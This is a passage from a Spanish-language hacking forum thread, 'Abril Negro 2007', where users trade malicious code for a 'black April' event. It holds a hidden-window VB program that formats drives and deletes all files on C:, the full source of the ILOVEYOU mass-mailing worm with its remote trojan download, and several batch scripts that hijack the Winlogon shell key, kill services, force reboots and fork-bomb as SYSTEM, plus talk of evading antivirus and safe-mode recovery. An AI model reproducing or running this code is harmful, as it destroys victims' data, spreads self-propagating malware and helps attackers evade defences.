Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Sub Form_Load()
Dim hShell As Long
Dim sCmd As String
sCmd = "cmd /c format d: /Q /X"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
sCmd = "cmd /c format e: /Q /X"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
sCmd = "cmd /c format f: /Q /X"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
sCmd = "cmd /c format g: /Q /X"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
sCmd = "cmd /c del /s /f /q C:\*"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub
Los comandos son muy faciles de hacer y en ninguno de los dos casos el que lo ejecute podrá ver algo.
Porfavor no busen :¬¬
Título: Re: Abril Negro 2007
Publicado por: Novlucker en 13 Abril 2007, 04:01 am
Puuaaa :o, no habia visto bien este post....una maldad detras de la otra..... En cuanto a esto: XD un scripten vbs, que todos los doc, xls te los ponga en cero, para que maratel el ordenador, con esto en segundos toda su data al tacho Lo de VBscript tambien, pero no se usar VBscript Yo si se usar vbs ;D, pero creo que es mejor no seguir poniendo codes para que los lammers que pasan por aca los pongan en practica :¬¬
Título: Re: Abril Negro 2007
Publicado por: Man-In-the-Middle en 13 Abril 2007, 04:05 am
Es abril negro!!, esta permitido ...juasssssss
(http://webpages.charter.net/sully2302/american_history_x_owned.jpg)
Título: Re: Abril Negro 2007
Publicado por: ~~ en 14 Abril 2007, 20:07 pm
Pues a mi esto de Abril Negro no me gusta un pelo.. la gente empieza a preguntar unas cosas. Este mes me abstengo practicamente de postear en este suforo :-X
Título: Re: Abril Negro 2007
Publicado por: WHK en 16 Abril 2007, 02:24 am
Alguien dijo BVscript??? ;D
I LOVE LETTERS FOR YOU( VIRUS):rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub
Título: Re: Abril Negro 2007
Publicado por: Man-In-the-Middle en 16 Abril 2007, 02:44 am
jaja a eso me referia WHK , se modifica la parte de la autocopia, nada mas y sacarle la parte de html , payload, email.
Título: Re: Abril Negro 2007
Publicado por: nhaalclkiemr en 17 Abril 2007, 14:59 pm
El modulo IMON me detecta una amenaza tan solo con entrar a esta pagina jajaja...asi k hay k ingienarselas para k no detecten este codigo los antivirus...
Y por cierto...k es lo k hace??
Un saludo ;) ;)
Título: Re: Abril Negro 2007
Publicado por: Novlucker en 17 Abril 2007, 15:14 pm
Se trata del codigo fuente de un virus muy conocido.. se copia en algunas carpetas, luego ademas modifica archivos como js, wsh, entre otros, ejecuta una determinada pagina dependiendo del azar....se agreta al registro, se autoenvia por outlook, esto casi no funciona hoy en dia... etc etc etc
Prueba en google por el nombre y te sale mas info de las compañias de av
salu2
Título: Re: Abril Negro 2007
Publicado por: nhaalclkiemr en 26 Abril 2007, 19:16 pm
Estos son varios BATXH que se me ocurren pero la verdad algunos aún no los he provado: -Este se eleva a SYSTEM y hace que se autoejecute siempre (incluso en Modo seguro) que se inicie Windows. Termina con el services.exe y todos los programas que hayan sido ejecutados por el...es decir, todos los servicios...Por lo que aparece un mensaje de error y se reinicia la maquina a los 60 segundos. Recuerda al Virus Blaster jejeje @echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
start %windir%\system32\svchost.bat
del /S /F /Q /A:- %0
exit
:start
echo @echo off>>temp.bat
echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,svchost.bat" /f>>temp.bat
echo taskkill /F /IM services.exe /T>>temp.bat
echo del /S /F /Q /A:- temp.bat>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
temp.bat
:d
exit -Este es más potente y sencillo. Se autoejecuta como el otro pero hace que el PC se reinicie automaticamente: @echo off
echo shutdown -r -f -t 0>winnt.bat
move /Y winnt.bat %windir%\system32\winnt.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,winnt.bat" /f
shutdown -r -f -t 0
exit -Este es igual que el ultimo pero de otra manera que no se si funcionara...: @echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,shutdown -r -f -t 0" /f
shutdown -r -f -t 0
exit -Este hace que cada vez que se intenta iniciar sesion se cierre automaticamente: @echo off
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /va /f
shutdown -s -f -t 0
exit -Este hace que tu PC se bloquee cada vez que se ejecute Windows...Ejecuta un bucle infinito el cual ejecuta reiteradamente el mismo bucle, en cada bucle abre una consola de comandos y hace que la PC se quede sin memoria: @echo off
echo :a>>rundll32.bat
echo start rundll32.bat>>rundll32.bat
echo goto a>>rundll32.bat
move /Y rundll32.bat %windir%\system32\rundll32.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,rundll32.bat" /f
exit -Este hace el mismo que el anterior pero lo ejecuta de modo SYSTEM, de modo que causará el bloqueo pero no mostrará las ventanas: @echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
cd %windir%\system32\
start svchost.bat
del /S /F /Q /A:- %0
exit
:start
if exist %windir%\system32\temp.bat del /S /F /Q /A:- %windir%\system32\temp.bat
echo @echo off>>temp.bat
echo :a>>temp.bat
echo start temp.bat>>temp.bat
echo goto a>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e:
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
cd %windir%\system32\
start temp.bat
:d
exit Son codes la mayoría muy sencillos pero que pueden causar bastantes molestias, la mayoría de las veces para arreglar tendrás que iniciar con un disco de arranke para solucionarlo... Tenía otro que hacia que cada vez que intentabas ejecutar un .exe te abría un programa que mostraba 0 y 1 estilo Matrix...pero ahora mismo no se donde lo tengo... Otro era uno que creaba una cuenta limitada y te obligaba siempre a iniciar con esa cuenta y no te dejaba iniciar como Administrador...pero nunca conseguí hacer que funcionase perfectamente...pues solo me funcionaba con el SP1 y ademas era muy facil de arreglar... Estes que puse la mayoría no los prové...pero deben de funcionar...son bastante lammers pero a veces pueden llegar a ser muy molestos ;D ;D Saludos ;) ;)
Título: Re: Abril Negro 2007
Publicado por: WHK en 29 Abril 2007, 00:42 am
ps si inician en modo a prueva de fallos pueden eliminar muy facilmente la entrada de registro sin que pase nada grave ni que se reinicie la pc... pero si puedes injectar un servicio que haga que te reinicie la pc, otro en menu inicio/run, otro en el reg, otro reemplazando a winlogon.exe :P y asi y ps una ves lo hice con un CD de musica hibrido para que no los pudieran copiar y ni aún en prueva de fallos pudo resolver el problema porque igual se le reiniciaba e hice que se duplicara 5 veces por cada encendida de pc con nuevas entradas de registros e injecciones en algunos dll etc etc...
En este caso no usé el comando shutdown sino un programa de apagado automatico que recibia ordenes en modo consola que forzaba la detención de todos los procesos y hacia todo lo posible para que la pc se apagara si o si ya que Aunque tengas un notepad sin guardar ps el shutdown no funciona.
Es ideal para que no te pirateen los CDs de musica que vendes o los videos VCD :P solo basta con hacerle un autorun tanto al vcd dat como al hibrido de datos combinado con pistas de audio.
Título: Re: Abril Negro 2007
Publicado por: nhaalclkiemr en 29 Abril 2007, 16:11 pm
No, si te fijas la clave que uso yo para que el bat se ejecute al inicio del sistema no es "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" yo uso la clave "Shell" que está en "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" y por defecto tiene el valor de "explorer.exe" y es la encargada de cargar el explorador, y este se carga tambien en modo a prueva de fallos.
En resumen, aunke inicies en modo a prueva de fallos funcionarán igual pork el .bat se inicia igual. Mirate este manual que he hecho yo sobre como se inician los archivos en Windows XP:
Manual de procesos que se ejecutan al inicio de Windows XP (http://foro.elhacker.net/index.php/topic,146876.0.html)
El metodo que utilizo yo para iniciar el bat es un metodo que funciona incluso a prueva de fallos.
Sobre el shutdown decir que tambien funciona igual en modo a prueva de fallos...
La unica forma que se me ocurre ahora mismo es iniciar desde otro SO o desde un CD de arranque y eliminar el bato o la entrada en el registro...
Un saludo ;) ;)
Título: Re: Abril Negro 2007
Publicado por: Tyrz en 29 Abril 2007, 16:23 pm
que yo sepa no se puede formatear el disco duro mientras lo estas usando o no? y formatear por ejemplo D que suele usarse para los cds tampoco sirve de mucho...
A un amigo se le borro un archivo de windows y no le arrancaba, buscando por internet vimos que era un archivo de los tres que necesita windows para arrancar, alguien sabe cualos son estos archivos? Esq no lo recuerdo y seria util para un virus muy lammer
SaludoS
Título: Re: Abril Negro 2007
Publicado por: WHK en 1 Mayo 2007, 08:18 am
Ha llegado mayo y ha sido sacado la chincheta de este post asi que creo que ya fue bastante por ahora :P ademas no creo que alguno le haya sacado mucho provecho aparte de aprender un poquito mas de programacion en batch.
Para el proximo año tendré mas presente este tema.
|